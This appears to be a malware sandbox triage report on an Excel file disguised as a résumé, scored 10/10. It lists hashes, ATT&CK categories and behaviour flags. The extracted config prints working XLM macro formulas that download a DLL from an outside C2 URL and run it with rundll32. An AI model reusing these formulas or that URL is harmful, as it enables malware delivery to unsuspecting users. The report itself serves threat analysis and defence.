0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2 | Triage

Resubmissions

10-04-2022 07:53

220410-jq25nsgaen 10

10-04-2020 08:18

200410-tmzpvazbjn 10

Sharing

General

Target

William Smith Resume.xls
Size

163KB
Sample

200410-tmzpvazbjn
MD5

0a054818926d97f4100774255a908dba
SHA1

de572eddd30b34d1e328c8d5fb986cc1e04c82e8
SHA256

0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2
SHA512

21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://march262020.com/files/april8.dll

Attributes

formulas
=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://march262020.com/files/april8.dll","C:\ProgramData\ieTneVi.dll",0,0) =CALL("Shell32","ShellExecuteA",AE1177,0,"Open","rundll32.exe","C:\ProgramData\ieTneVi.dll,DllRegisterServer",0,0) =HALT()

Targets

- Target
  
  William Smith Resume.xls
- Size
  
  163KB
- MD5
  
  0a054818926d97f4100774255a908dba
- SHA1
  
  de572eddd30b34d1e328c8d5fb986cc1e04c82e8
- SHA256
  
  0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2
- SHA512
  
  21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1
Score

10^/10
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- Process spawned suspicious child process
  This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
behavioral1 behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks

static1

behavioral1

behavioral2